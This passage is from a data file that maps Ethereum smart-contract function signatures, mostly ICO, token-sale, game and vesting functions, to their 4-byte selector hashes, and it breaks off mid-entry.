"walletBountyProgram()": "0xf055d324", "tournamentBankCut()": "0x1c44bac7", "freezedMoment()": "0xc8781368", "teamEmail()": "0x5b01b5b3", "minTokensToCreate()": "0x0c3b7b96", "E18()": "0x66d598f0", "limitETH()": "0xc26381f2", "foundersWallet()": "0x1bfaf155", "minPurchaseLimit()": "0x3deaa323", "formated_data_url()": "0xf5d9d3fd", "numAssets()": "0xa46fe83b", "finalizeIcoDate()": "0x32f8e034", "getActiveGames()": "0x1b76929c", "TREASURY()": "0x2d2c5565", "icon()": "0xc557b985", "signatureCheckerFreezed()": "0xeb886568", "vendorWallet()": "0x14dcfd55", "AIRDROP_WALLET()": "0x00a32af6", "COLOR_WHITE()": "0x4caf6231", "secondXRChangeBlock()": "0xd6b6f9f1", "swapActivity()": "0x32a55bb4", "preIcoPeriod()": "0x427fc2df", "disbursement()": "0xc368b160", "saleopeningTime()": "0xc18edde1", "initialBlockTimestamp()": "0x4b3d81b6", "correctedHeroContract()": "0x10ece9c6", "WIN_PERCENT_PER_DISTANCE()": "0x779ce152", "preInvestStart()": "0x0d39820c", "contractMax()": "0x519559ed", "blockInterval()": "0xc4c22e98", "buyabletoken()": "0x4f1d76ef", "PreICOPrice()": "0x54cc463b", "_symbol()": "0xb09f1266", "requireCustomerId()": "0x03ca0eed", "end_Time()": "0x032b3400", "candyTotalSupply()": "0xa6dcb12d", "masternodeMineTokens()": "0xa9767e14", "setRecommenderAllow()": "0xeb40a9c8", "summFounders3()": "0x63aa109c", "thresholdNewAuction()": "0xee93114c", "totalReservedTokenAllocated()": "0xb494f1fb", "PROMETHEUS_PRICE_INCREMENT()": "0x90eb9632", "start_ico()": "0x4260c779", "currentFunds()": "0x838ca346", "VESTING_TIME()": "0x0dea38b6", "OWNER_LOCK_BLOCKS()": "0x76421887", "SINGLE_SALE_MULTIPLIER()": "0xbe86d996", "mostSent()": "0x6886bf1c", "MAX_OPEN_SOLD()": "0x2f86f2ee", "lastBlock_f16Hash_uint256()": "0x04a1eb6b", "BACKUP_ONE()": "0x1a55b8f7", "contributionCount()": "0x5b18056b", "AgreementHashRu()": "0xcb89558d", "bancorChanger()": "0x7c6e481c", "firstPresaleStart()": "0xc5ed7162", "calculateCurrDynamicPrice()": "0x922ba128", "MIN_INVEST_ACTIVE()": "0xc4618978", "HATCH_COOLDOWN()": "0x682baa3a", "totalAlloctedToken()": "0xb236b068", "weiForMcr()": "0x30322b12", "icoEth()": "0x20035e36", "current_state()": "0x5b04cbb5", "bonusRatePrivateSale()": "0x360f1d07", "resultsPublished()": "0x5f589599", "totalEscrows()": "0x63ee7c8d", "minimumFundingAmount()": "0x783c8db0", "tokenBuyRate()": "0x21cefec0", "mimetype()": "0x2a3590b9", "assetOwner()": "0x9ac9940f", "oneEtherIsHowMuchFST()": "0xa79ec95a", "refundState()": "0x03f499b8", "indVestingDeposit()": "0x08d067bc", "unitsOneEthCanBuybefore()": "0xa990dd52", "BGB_address()": "0x2b29908d", "ReserveFundAmount()": "0x90f0f4f4", "targetEth()": "0x65d4bdab", "advisorsAllocation()": "0xfb064161", "richardAddr()": "0x79955b4c", "BONUS2()": "0x4b4c0d7c", "tokensReserved()": "0x433adb05", "founderTokenUnlockPhase2()": "0xdf426401", "block2()": "0xa58c30c5", "BTCproxy()": "0x31666144", "gapFactor()": "0xc10be521", "lockedAccountThresholdEth()": "0x8a654a64", "lastFund()": "0x65ffe43d", "CROWDSALE_ETH_WALLET()": "0x2ca1b7da", "ETHER_MIN_CONTRIB_PRIVATE()": "0xaa1f609f", "BLOCKSUNTILCLEANUPSTACK()": "0x40a19a71", "WHITELIST_SALE_PRICE()": "0xbc912e1a", "isCrowdSaleClosed()": "0xa26d7b94", "initGameAt()": "0x335b52f2", "totalPreSaleStage()": "0x2845c8cd", "registrationDeadline()": "0x11184392", "encoding_description()": "0x7510c5a0", "dividendsTotal()": "0x5d5b35f3", "rateForPreICO()": "0xbcbd82e5", "owner2OK()": "0x07f30f6a", "systemStartingPriceMin()": "0x70bab35d", "worldCupResultPart4()": "0x69ab98dd", "hgtDecimals()": "0xffc0d035", "sponsoredBonusAmount()": "0xcbd5131b", "MINERS_HOLDER()": "0x8261c4c7", "auctusTokenAddress()": "0x18456048", "PRESALETOKENMAXSALES()": "0x2e450881", "mintTimes()": "0x755cc41e", "lighthouseLib()": "0xda302fc3", "clearStartTime()": "0xaf21037f", "managerUnset()": "0xd217b149", "walesaDawajMojeStoMilionow()": "0x10f91e39", "minimumWEI()": "0x7e007c1e", "exchanger()": "0x4d12fca4", "withdrawInviteRewardToOrder()": "0xe4ea58a5", "INITIALGASFORORACLIZE()": "0xef2e7321", "numOwnershipStatuses()": "0xeb0f4b33", "initWidth()": "0xc365d4f0", "currentSaleAddress()": "0x977ff98f", "fortyEndTime()": "0xe5027880", "promoCreated()": "0x0591eb24", "payOwnerOnly()": "0x18bdc79a", "ta()": "0x3b16c27a", "sanityRatesContract()": "0x47e6924f", "icoRunningStatus()": "0xf8e43382", "getBidCount()": "0x28f6a48a", "totalStakes()": "0xbf9befb1", "icoEtherMinCap()": "0xc138195c", "TOKEN_SALE()": "0xc0d75442", "ccUserCount()": "0x5986dbe4", "weekFourStart()": "0xc71c890a", "JiggsR()": "0xe35c606b", "REFERRAL_PROGRAMS()": "0x6daaf67b", "merchantHistory()": "0x3d17a2d8", "blockEndICO()": "0xf15f2bf0", "PRICE_MIN()": "0x6f16a595", "stage_2_maxcap()": "0x3cd9a0fa", "firstPeriodOfICO()": "0x344c5fd6", "tokenOwner()": "0xa3e67610", "COMPETITION_VERSION()": "0x54ecaba4", "minimalETH()": "0x34dcfec4", "getMin(uint16[])": "0x7526f98c", "grantReserveSupply()": "0x448d76a3", "InitiateTeams()": "0x2e99df84", "tokensIssuedCrowd()": "0x4b75f046", "mineSoul()": "0xa5422d8a", "getSaleAuctionAddress()": "0x4f238029", "minBuyAmount()": "0xf66bf229", "_sold()": "0xaabd5b88", "calcTokenCost()": "0xa7668eba", "validationWallet()": "0x4e83977a", "ICO_BONUS2_RATE()": "0x10b3d502", "engDevAddress()": "0x8cf20038", "getAvailableAmount()": "0x7bb476f5", "stage_Days()": "0x07ae279c", "bonusEnds15()": "0x851bb3c3", "reserveTokenWallet()": "0x92a0fd64", "blocksToWaitShort()": "0x32624053", "ICO_BONUS_RATE()": "0x42419336", "PIXEL_COUNT()": "0x0c9fe5eb", "tokenPurchased()": "0xb99f6073", "hardCapPrivate()": "0xb3113d3f", "percentageETHReserve()": "0x847dc0a7", "migrateMyTokens()": "0x73e1851b", "privateLimit()": "0x3c3b7995", "recoverUnawardedMILs()": "0x7f877710", "contractFeeMinAmount()": "0x56c49c2a", "gemCriticalRateConversion()": "0x01d5c488", "getAllJinglesOnSale()": "0xc591c8a3", "third()": "0xa6dc6771", "finalizedUpgrade()": "0x47858c79", "faucetThresholdSecs()": "0xa52b121e", "preICODeadline()": "0x68250963", "minTokParticipate()": "0x55aff5ba", "devfee()": "0x314094c2", "restWei()": "0x41aeaea7", "saleMinShares()": "0xfc7e4768", "transferredTokens()": "0xb0bd5888", "cycle()": "0x6190c9d5", "BOUNTY_LIMIT()": "0x987b904b", "TIER3_CAP()": "0x4a51dcea", "releaseStartTime()": "0xe97d87d5", "newRateTime()": "0x9899722d", "_presaleSupply()": "0xf449c3cb", "totalRecalled()": "0xc85e1f73", "crowdsaleFinishTime()": "0x9789f9da", "clockairdrop()": "0x9014b075", "proofSet()": "0x079172da", "times9()": "0x041fa8aa", "ownerName()": "0x65ac2320", "lockupDate()": "0xb5f09a39", "ShitCloneslordReq()": "0xbe83a6b4", "MainSaleStart()": "0x8c5e2b0e", "mined_blocks()": "0xaf76c4d2", "endBlockBonus2()": "0x1fc86532", "startsecurities()": "0xa6e826e8", "crowdsaleMinter()": "0xdcb36063", "CROWD_WAVE3_PERIOD()": "0xe2188190", "AOC_available()": "0x6185bb50", "mainSaleStartDate()": "0x535f23ad", "sendEtherManually()": "0xae1dd78c", "MAX_GOAL_EBC()": "0x4056fe06", "contractActive()": "0xe289fcb6", "casinoBalance()": "0x1c014c60", "increaseK()": "0xe9546d08", "bntyController()": "0x5bf47d40", "USDWEI()": "0x54fbde65", "month6companyUnlock()": "0x7d59a938", "IcoWallet()": "0xdcf90793", "totalCommitted()": "0x1d3231d4", "toogleStatus()": "0x85b75b1e", "registryBase()": "0x39ca6e86", "tokenContractDefined()": "0xa970ef6e", "emaValue()": "0xa48205cb", "Increase()": "0xfb6f9579", "tokenPriceInEth()": "0x196c16cb", "airdropBSupply()": "0x04150694", "blockExpiration()": "0xd4595aaa", "ethCostTotal()": "0x131bb0d6", "secondsTimeLocked()": "0x37bd78a0", "crossForking()": "0x8191d30f", "minCrowdsaleAllocation()": "0x606baff8", "ethUSDOracle()": "0x706eb3ab", "secondsPerDay()": "0x63809953", "checkGameStart()": "0xabbdc272", "migrationManager()": "0x187ac4cb", "getAllInvestments()": "0x8d9ad08e", "companyAddress()": "0x53e1ead9", "FACTOR_2()": "0x32bf1def", "reservedFunds()": "0x509c5df6", "etherERC20()": "0x85113156", "bitexlive()": "0x0a7c1922", "tokensSoldGoal()": "0x878808af", "currentAmountOfTokensWithNoBonus()": "0xb53148ad", "sumICOStage3USD()": "0x5bc7285f", "IcoFund()": "0xdd5e403c", "collectTokenPhaseStartTime()": "0x22542fb6", "stage1Start()": "0x0c087bc5", "newTokenContractAddress()": "0x1aa359ff", "TeamMembersAmount()": "0x42c50f75", "mtv()": "0xdf49804a", "tokenCapForSecondMainStage()": "0xa67bb583", "presale()": "0xfdea8e0b", "finishRoundC()": "0x1c49d19f", "readAllFrzAcc()": "0x673c0e53", "tokenDev()": "0x3b4e8dbf", "growCost()": "0xe2865b4d", "checkAllRewPaid()": "0x09987f3c", "HARD_CAP_TOKENS()": "0xb1c16a2b", "preSaleEtherRaised()": "0xbfbad8b9", "thirdCheckpointPrice()": "0x23626067", "unpauseAngelToken()": "0x942bc8d4", "generalTerms()": "0x007bd509", "end_date()": "0x33bbae93", "Tax()": "0x6ea405d3", "stateControl()": "0x04b2bf99", "AIRDROP_ADDRESS()": "0x02b04384", "payPool()": "0x95722e66", "presalePrice()": "0x000e7fa8", "tokensForplutonics()": "0xb17e8c4f", "forking()": "0x5130c857", "totalSupplyCrowdsale()": "0x22a7ba2b", "trancheSize()": "0x6cfc82ed", "Remain()": "0x168936a0", "ownerBurnUnsoldTokens()": "0x0860a902", "setTokensControlInfo()": "0x5ffcb734", "NewUser()": "0xa85a726d", "RoundCHardCap()": "0xdd3032bc", "crowdsaleInfo()": "0x90db78f9", "_oneTokenInWei()": "0xd2727e6c", "ALLOC_SALE_CORNERSTONE()": "0xb781ad99", "threeHotHoursTokensCap()": "0xb252ff2b", "startDate2()": "0xb45156fc", "SALE_DURATION()": "0x6d79207c", "fundingUnlockFractionInvert()": "0x5949e525", "lastKickoffDate()": "0x67cf91c9", "redenom_dao_fund()": "0x51651003", "tokensPerWei15()": "0xe32c65f2", "otherchainstotalsupply()": "0x2d47c29e", "MAX_CONTRIBUTION_USD()": "0x01340592", "sysPrice()": "0x53cc3e7a", "RATE_EXPONENT()": "0x6efd1adf", "genRNGContractAddress()": "0xd33e1a48", "SunPowerToken(address,uint256)": "0x8a47cadb", "canTransfer(address,uint256)": "0xd45e09c1", "setFinaliseTime()": "0xa7638346", "allocateTokenForAdvisor(address,uint256)": "0x651398e6", "allocateTokenForTeam(address,uint256)": "0x678f4467", "allocateToken(address,uint256,uint256)": "0xcb4360d9", "BFDToken()": "0x1bea67b7", "RBFToken(uint256,string,string)": "0x4eff86e7", "ROPCOIN()": "0x4ddb5f01", "TokenTKC()": "0x0777fa95", "_allocateUnspentRefTokens()": "0xf28a2f75", "SolarioToken()": "0x4e280fd6", "BitTeamToken()": "0x61558349", "Bitcoineum()": "0xa0979332", "checkWinning(uint256)": "0xdda6c3ce", "checkMiningAttempt(uint256,address)": "0x88537daf", "checkRedemptionWindow(uint256,uint256)": "0xc3de7cbf", "checkBlockMature(uint256,uint256)": "0x333cfa14", "targetBlockNumber(uint256)": "0x34805e7c", "isBlockRedeemed(uint256)": "0xfa90693b", "claim(uint256,address)": "0xddd5e1b2", "calculate_reward(uint256,address,uint256)": "0x6f4ebb70", "adjust_difficulty()": "0x3c65c506", "calculate_next_expected_wei(uint256,uint256,uint256,uint256)": "0x2b000f00", "calculate_base_mining_reward(uint256)": "0x12a00b21", "calculate_proportional_reward(uint256,uint256,uint256)": "0xbaa3fc48", "calculate_range_attempt(uint256,uint256)": "0x555aaff6", "calculate_difficulty_attempt(uint256,uint256,uint256)": "0x90c46985", "checkMiningActive()": "0x608d031a", "getMiningAttempt(uint256,address)": "0x9a2457c1", "getBlockData(uint256)": "0x1c9ab3ad", "getContractState()": "0x7f4e4849", "get_internal_block_number()": "0xc539607c", "external_to_internal_block_number(uint256)": "0xfab425e7", "current_external_block()": "0x014c3dbc", "resolve_block_hash(uint256)": "0x6eadeba0", "transmuted(uint256)": "0xe24a5042", "transmute(address,uint256)": "0xf52ae24b", "Constructor(uint256,string,string)": "0xc2faa691", "getWeekNumber()": "0x06f57add", "getInvestments(address)": "0xfc73c86e", "DWBTICO(address,address,uint256,uint256,uint256,uint256)": "0x4d7b8d2f", "BaseICO(address,address,uint256,uint256,uint256,uint256)": "0x0f4170f2", "CNRToken()": "0x0c486c00", "DEEO()": "0x9a95d0e4", "EtherCartel()": "0xbd8d5c7f", "TacoToken(address,string,string,uint256,uint256)": "0xae95a7a4", "hentaisolo()": "0xa3df870a", "RealMadridvsLiverpool()": "0x273b1dd3", "SspStandardToken(uint256,string,uint8,string)": "0x1338c9e9", "KToken()": "0x593d280d", "getPurchaseAmount(address,uint256)": "0xf1588d66", "extinguish()": "0xc54837a4", "ignite()": "0xf768923a", "setMaxGas(uint256)": "0x8e928076", "Base(uint256,string,uint8,string)": "0xcf89956e", "QUIKKO()": "0xa969f080", "Mahjongcoin()": "0xea76a36f", "transferDirectorB(address)": "0x72c1df4c", "transferDirectorA(address)": "0xdd34abd3", "proposal(address,uint256,address)": "0x6e3f3f1a", "GlaidexToken()": "0xfbf94ce1", "setOzr(address)": "0x02175beb", "OZRealestatesToken()": "0x61f134fa", "changeOzreal(address)": "0x4f1f99aa", "DRC()": "0x6e41a78f", "DOJI()": "0x6319d32f", "setApprovedWallet(address)": "0xae6a1c30", "confirmAddressChange(address,address)": "0xbff44f0d", "requestAddressChange(address)": "0x0633cd32", "endVesting(address,address,address,address)": "0x05117619", "registerVestingSchedule(address,address,address,uint256,uint256,uint256,uint256)": "0xb787b91d", "registerVestingScheduleWithPercentage(address,address,address,uint256,uint256,uint256,uint256,uint256)": "0x1f5a177f", "VestingWallet(address)": "0x931c6246", "KingToken()": "0xab948370", "DariaRotkoToken()": "0xbb59d68c", "finishMintingTokens()": "0xe2dc5da5", "setRateICO(uint256)": "0x6ad43a54", "setRatePreICO(uint256)": "0x4c95ca9c", "MSPT()": "0x93be0f83", "unlockSecondTokens()": "0x238f7743", "unlockFirstTokens()": "0x50b5bc93", "isSecondLockTimeEnd()": "0x3b29fe55", "isFirstLockTimeEnd()": "0xdeed4b80", "TeamTokenLock(address,address)": "0x07394d39", "TaiyuanCoin()": "0x7bd53618", "TransformCoin()": "0x85c07546", "updateExchangeRate()": "0x02ce728f", "addInvestor(address,uint256)": "0xec20b457", "changeMarketingRecipient(address)": "0x220c773a", "changeDevelopersRecipient(address)": "0xcff72e67", "StormBrewCoin()": "0xccb20e8e", "CR7()": "0x75a55a44", "getRequiredBalance(uint256)": "0xdf67184a", "adjustPrices(uint256,uint256)": "0x993090d0", "extraBalanceNeeded(uint256)": "0x59fd510a", "amountAvailableToCashout()": "0xd4e7b9cf", "lacksFunds()": "0xc2083f55", "processSell(address,uint256,uint256)": "0x1f7299c1", "processBuy(address,uint256)": "0xea274a6b", "activityAddress()": "0x0b341245", "PERC_TOKENS_TO_INVESTOR()": "0x375f3a9d", "preCoinSentToEther()": "0x30a39d5d", "CollectibleIndex3()": "0x668faae8", "god()": "0xba56f6ee", "cycleLimit()": "0xefad6df3", "allEthOUT()": "0x3da79946", "totalSupplySale1()": "0x39c73169", "current_transferred()": "0xde283b21", "extraBalance()": "0x21b5b8dd", "totalFundsDistributed()": "0x19bee474", "statusI()": "0xce483c42", "local()": "0x0f166ad4", "settingsState()": "0x5f437e48", "c_paymentChannelBonusPercent()": "0x8aea12b6", "investorsTokensPercent()": "0xb284fc29", "Raffle_ID()": "0x8c003134", "keyFoundation()": "0xacbc3ff4", "ContributionToPrizeFund()": "0xcbd8ff79", "icoEtherReceivedTotal()": "0xb9ac0524", "makerDAO()": "0xabd49646", "teamAddressTwo()": "0xd71e930c", "Rewards_Supply()": "0x8f1f761a", "ReserveAddress()": "0xa5a2286b", "HOURLY_VALUE_DECAY_RATE()": "0xeebba256", "btcsPortionTotal()": "0xf8aed03a", "preSaleWallet()": "0x1fc75e41", "recommendPaused()": "0x38299afd", "buyVIBET()": "0x11f45f23", "configRoundKeyAdd()": "0xa236a3d7", "tier4()": "0x33ae7166", "withdrawGoldMoney()": "0x5f40fc27", "crownUnFreeze()": "0x73e52855", "Token_Unlocked()": "0x4d7e2a6a", "baseTokensSold()": "0xa65e91b8", "manager_()": "0xeb3fa926", "HOVERCRAFT_TYPE()": "0xcf64da7f", "FixProfit()": "0xb0a91659", "btcRaised()": "0x78af63ac", "refundCount()": "0x0bda4dbf", "saleWeiCap()": "0xc80d3694", "MINER_AUCTION_DURATION()": "0x1c088897", "CPGPEREGRINE()": "0x08b40dc6", "projectMemberAddress()": "0xe77900e9", "tokenToFounder()": "0x4fde7cd9", "BITCOIMINIG()": "0x512392cc", "_oldConfig()": "0x6d339f02", "filmpaid()": "0xec15afe1", "tokenAddressesSet()": "0x808a69e2", "burnTokenStatus()": "0xef2025c2", "huntingPrice()": "0x16685890", "gameStarter()": "0x56b32da1", "maxCapEth()": "0xc8bc6fa0", "daiRate()": "0xd9c522ec", "foundersTokens()": "0x0e449cf9", "retraitStandard_5()": "0xcf191540", "getSenderArmyDetails()": "0x42ed00da", "priceToMint()": "0x4dc1dbec", "m_chiefOwnerIndexBit()": "0xae77d51f", "_contractStatus()": "0xe6e88593", "wethToken()": "0x4b57b0be", "REGISTERFEE()": "0x9956587e", "partner1()": "0xa4c7c7b3", "currentLowest()": "0x7ea01c0d", "isDiscountValue()": "0xb29775c1", "claimed_blocks()": "0x0ee33c70", "getAllCompanies()": "0x408bf4c3", "buyerTokenName()": "0x3ed2d908", "totalAllStage()": "0x02361dbc", "ROLE_PAUSE_ADMIN()": "0x47492352", "nextroundlength()": "0x9279011c", "PRE_SALE_START_3()": "0xffcecf09", "tokensSoldAtIco()": "0x4dd33832", "totalVesting()": "0x7c17357d", "priceIncrease_20_January()": "0x48330262", "PRESALE_TOKENCAP()": "0xe73c032b", "setRepayment()": "0xa580a5b0", "REFUND_PERIOD()": "0x7f6578d3", "minimum_deposit_amount()": "0xa9d66352", "TBT_MINER()": "0x8ac44de2", "totalBalances()": "0xa69a2ad1", "totalSpending()": "0x6997bcab", "newContractAddr()": "0x32513ce5", "minContributionUSDc()": "0x253f89b0", "tokensForAdvisors()": "0x35b6a6c6", "sizeLimit()": "0x210fd271", "secondBonus()": "0x61bb246c", "deliveryTime()": "0x45fe5a83", "ProICOPrice()": "0xafc7c400", "minSumICOStage7USD()": "0x429adcb9", "CONTRACT_ADDRESS()": "0xdb4ecbc1", "isTokenTransferable()": "0x958222aa", "MINIMUM_PURCHASE()": "0x2182f7b4", "makerFeeRateE4()": "0x08195e10", "etherToUSDrate()": "0x8f71b3db", "promoLimit()": "0x889231c1", "withdrawls()": "0xf3576220", "isIcoRunning()": "0x9258d5a3", "advisersPeriodAmount()": "0x5ad1854b", "currentFundingStage()": "0xee1e61b2", "decreaseAllowed(address,uint256)": "0x9fa5df9c", "votar(uint256,bytes32)": "0x565287c9", "addCandidato(string)": "0xa8ffa9d9", "setVotingParams(uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0x53d70700", "useResolver(string)": "0x045aceb9", "getResolver(string)": "0xe4ae7d77", "updateNameIP(string,string)": "0x00cc48a6", "updateNameResolver(string,address)": "0x7819d30d", "releaseName(string)": "0xd310bc32", "registerNameResolver(string,address)": "0x37a1c84f", "registerNameIP(string,string)": "0xc8b82220", "nameok(string)": "0x03d285fd", "checkRemained(uint256)": "0x21d1a303", "USDCX()": "0xa1ddcd2d", "createAuction(uint256,uint128)": "0x7a906be0", "mint(string,string,string)": "0xd645ddf6", "getDesign(uint256)": "0x9971b98d", "invalidateStage(uint256)": "0x40a1f4d5", "allocateSurvivorWinnings(address)": "0x10e6a223", "retreiveHrt(string)": "0xb98aacf0", "returnHrt(address,string)": "0xcda43ec5", "setMinimumClaimValue(uint256)": "0x8ca51f82", "generate(address)": "0x2fa61cd8", "heldTokens(address,uint256)": "0xe154d17d", "minimumDonation()": "0x96d8f4f3", "getVotingParams()": "0xa6c8210e", "setVotingParams(uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0x77c0891f", "getFreelancerParams()": "0x764d1e04", "setFreelancerParams(uint256)": "0x23d6c92f", "ProofOfAwareness()": "0xe8763023", "checkTeamUnlockedTokens(address)": "0x0eb4c7d6", "setBBO(address)": "0x7937f46d", "setFaucetAmount(uint256)": "0x81d2fd9c", "setMaxFaucet(uint256)": "0x85da1192", "itcERC20()": "0xdc851b02", "SedPOWToken()": "0xff6d24b1", "getNextAvailableBond()": "0x346c1aac", "getTotalBondValue()": "0x394a8698", "gettotalBondDivs(uint256)": "0xca76ecce", "getBondOwner(uint256)": "0xbb305ef2", "getBondPrice(uint256)": "0x4b21aaae", "setLowerBondPrice(uint256,uint256)": "0xffc797e4", "setRates(uint8,uint8,uint8)": "0xb280f180", "setAutoNewbond(bool)": "0x86b715bd", "setAllowReferral(bool)": "0x763f337e", "addNewbond(uint256)": "0x487621cc", "setBondPrice(uint256,uint256)": "0xa1aad09d", "setMaxbonds(uint256)": "0x7d53409a", "setInitialPrice(uint256)": "0x9f4ba0ee", "withdrawPart(uint256)": "0x7daf06fd", "extDistributeBondFund()": "0x76fc53c0", "distributeBondFund()": "0xababe93d", "distributeYield(uint256)": "0xc8cc5cd8", "addTotalBondValue(uint256,uint256)": "0x21df8b9b", "BONDS()": "0xb4abea24", "make()": "0xc6dad082", "prove(bytes32,uint256)": "0xd9969061", "fechVoteSumNumForCandidate(address)": "0x20f1895c", "deleteCandidateByStage(address,uint256)": "0x0cfa8af4", "theclub()": "0x230dff66", "TechieCoin()": "0xff4bf170", "createFixedPeriodVpfFactory(string,bytes32,uint256,uint256,int256[],uint256,uint256,uint256)": "0xd86e79c3", "createNonRepeatableVpfFactory(string,bytes32,uint256,uint256,int256[])": "0xa4039a2a", "unpauseFrom(uint256)": "0xf3b6a748", "setResolveValueGasLimit(uint256)": "0x257fc838", "setOpenValueGasLimit(uint256)": "0x66f99a11", "addVpf(bytes32,uint256,uint256,uint256,uint256,uint256,int256[])": "0x8a4cae0e", "decimalPoints(bytes32)": "0xf95440ba", "request(bytes32,uint256,uint8,uint256)": "0x45ff8fde", "revokeToken(address,uint256)": "0x29bd58b4", "burnToken(address)": "0x950dad19", "changePTSBAddress(address)": "0xc1dbf5ef", "toggleRedeemActive()": "0xd596c862", "DeveloperCoin()": "0x77f929fb", "_newAuction(uint256,uint256,uint256,uint256)": "0xbb1488d8", "batchNewAuctions(uint128[],uint256[],uint256[],uint256[])": "0xeeb415ee", "newAuction(uint128,uint256,uint256,uint256)": "0x8aa2c280", "isOnPreAuction(uint256)": "0x6fc4f2c2", "Rose43()": "0x8223188c", "transferBecauseOfAggregate(address,uint256,address,uint32,uint256[],uint256[])": "0xd1ae0488", "transferBecauseOf(address,uint256,address,uint32,uint256)": "0x148cd939", "completeProvision(address,uint32,uint256,uint256)": "0x698d8a1e", "updateProvision(address,uint32,uint256,uint256)": "0xf6340be4", "getProvisionCreditsRemaining(address,uint32,uint256)": "0x334fe638", "transferToService(address,uint32,uint256,uint256,uint256)": "0x2cf0be44", "changeServiceUpdateAddress(uint32,address)": "0x29223bdb", "updateServiceMaxCreditsPerProvision(address,uint32,uint256)": "0x10b0a4cb", "getServiceUpdateAddress(address,uint32)": "0x0f226a31", "listService(uint32,string,uint256,uint256,address,address)": "0x16a7859b", "listSimpleService(uint32,string,uint256,address,address)": "0x3bb9f133", "SbToken()": "0x300c7063", "VisualTechnologyToken()": "0x3a6a0474", "TR()": "0x34133df9", "SedPosToken()": "0x79d10a76", "ORCA()": "0xac1e4734", "addRecordwithReward(bytes32,string,string,address)": "0x5334398f", "getTxt(uint256)": "0xff37839b", "saveTxt(string)": "0x02521b16", "getPic(uint256)": "0xcf82731f", "savePic(string)": "0x96370fa2", "TEAM_LIMIT()": "0x368bf74e", "app_storage()": "0x792651b0", "BANKROLL_LOCK_PERIOD()": "0x18a6d765", "RecallTokensFromContract()": "0x7dbbf2e6", "AVAILABLE_RESERVE_SUPPLY()": "0xfefc7089", "totalLose()": "0x4414a5c8", "ico_period()": "0xb7688c8b", "moduleRegistry()": "0xb95459e4", "projectStorageVault()": "0x345b256a", "product1()": "0x09f4614d", "price5()": "0x641e90de", "cancelled()": "0x9a82a09a", "STATE_BET_ENABLED()": "0x28fe549a", "contributorsCompleteCount()": "0xdc45b93a", "LifeFactor_iii()": "0xeaa8e6d8", "investmentGuidesRewardsWithdrawn()": "0xb770486f", "REWARD_SUPPLY()": "0x73e40ed4", "summTeam()": "0x0d6f6f0b", "getBylawsCashBackVoteRejectedDuration()": "0x98a892c9", "timeLockPeriod()": "0x78446bc1", "escapeCaller()": "0xf17f6f8a", "OfficalHolding()": "0x902025bd", "BETNetworkTeamAddress()": "0xcd1fca94", "setBonus()": "0x3e379d64", "isEnd()": "0x2fc6e8b7", "RESERVED_TOKENS_FOR_FOUNDERS_AND_FOUNDATION()": "0x6d7bc487", "getRecentDiary()": "0xd768729d", "dungeonDifficulty()": "0x1aa7e54c", "currentIco()": "0x41f48ebf", "wpxTeamAddress()": "0x2a4ef2a3", "CORE_TEAM_TOKENS()": "0x5ac49ba1", "totalTokensSoldInThisSale()": "0x755f12db", "defaultAmount()": "0xfc27ea83", "crowdsaleEnds()": "0xc9406e86", "destinationMultisigWallet()": "0xa1fd92f5", "backup()": "0x50a9e127", "pausePriceRaise()": "0xad2377c1", "personalCap()": "0xc7c2aee3", "balanceA()": "0x9c4eda5c", "GOLD_AMOUNT_NDC()": "0x41ba4738", "vote01YesCount()": "0x2247328c", "maxGasRefund()": "0xf24a6997", "publicSaleMode()": "0x8547bb3a", "controllerLocked()": "0x171fc143", "TeamVestTimeLimit()": "0xb9204d1c", "marketCells()": "0xe56a9973", "bride()": "0xc9e077e6", "rateForPhase3()": "0xa122e060", "claimVotingRight()": "0x91e7f7bc", "wallocked()": "0xe66dda4e", "kkk()": "0x2872a8e7", "player3Timestamp()": "0xe5cfd1bc", "PHASE3_START_TIME()": "0x337d2aea", "canIssueIndividual()": "0x375c405d", "round1BonusSteps()": "0x30389c45", "raffleRewardAmount()": "0x092ecf1c", "INTERFACE_SIGNATURE_ERC165()": "0x2b8af65b", "oraclizeGas()": "0x3e9836c6", "deathData_v16()": "0x829e9ece", "wasSuccess()": "0x9615ecb2", "lockedVault()": "0xb7b3b89a", "maxIcoTokenLimit()": "0x4c6ebbbe", "contract_alive_until_this_block()": "0xd21fa4e1", "scheduledPayout()": "0x21376d07", "total_burned_by_raffle()": "0xb415c4ca", "phaseOneEnd()": "0x663152d1", "icoStartP6()": "0x42daf6ee", "settings_added()": "0x1b531d4b", "ICO_WALLET()": "0xdc5a2199", "First_pay_clientmanager()": "0x361fd603", "currentPotSplit()": "0xb5004d1c", "RATE_FOR_WEEK1()": "0x0bf84797", "next_giveaway()": "0xf1610120", "isPreSaleReady()": "0x1efad671", "saleStart()": "0xab0bcc41", "lcBalance()": "0x65e47208", "publicityFunds()": "0x28a741db", "noHash()": "0x6b3fb674", "AMBASSADOR_SIX()": "0x8b8373ca", "ico1Bonus()": "0xafbb9d44", "maxBetDoubleDice()": "0x97217085", "targetDiscountValue7()": "0x876e79f6", "areFundsReleasedToBeneficiary()": "0xd21077f3", "salesAllocation()": "0x3281c4e1", "PRESALE_TOKEN_ALLOCATION()": "0x94da0746", "minInvestmentPreICO()": "0x4203ea57", "parent()": "0x60f96a8f", "maxAllocation()": "0x9b3ba79f", "pause_4()": "0xfddbcca5", "customerPool()": "0x73bc1b2f", "minContribute()": "0xb59a60db", "transferTokenTo()": "0xf6151ff6", "ownerTokensFreeDay()": "0xac4d2e95", "nextMinimumTimeout()": "0xa91bc3cd", "DOW_THU()": "0xcfbb9f37", "totalMarks()": "0x66af77ca", "endCrowdsalePhase3Date()": "0x57d93329", "approveFee()": "0x2f7f7f55", "nextFinalTimeout()": "0x49f30178", "loanAmount()": "0x9d585f7f", "allOfferingQuota()": "0x0be72b6d", "GMR_TOKEN_SALE_CAP()": "0x881056ba", "bankerAllDeposit()": "0x6b62cd65", "MyTotalNTD()": "0xf20431c8", "ico3Bonus()": "0x97062e8a", "CAT_PER_ETH_SECOND_EARLY_BIRD_RATE()": "0x8b0451d9", "totalRised()": "0xc587e3d6", "multiplier()": "0x1b3ed722", "developer_BSR()": "0x9228e90d", "fundingRatePredictionBonusClaimWindow()": "0x7845b86e", "icoPhase1TimeBonusInPercentage()": "0x4748f7c2", "limitPresale()": "0xb489c597", "FOUNDERS_WALLET()": "0x7dec3d35", "mtrx()": "0xf1388f14", "feeAmountThreshold()": "0x55ce76e6", "w_Reserv()": "0x934ea572", "getOpenedStageIndex()": "0xa3508b17", "nTickets()": "0x5c49d96c", "exchangeRateRoundOne()": 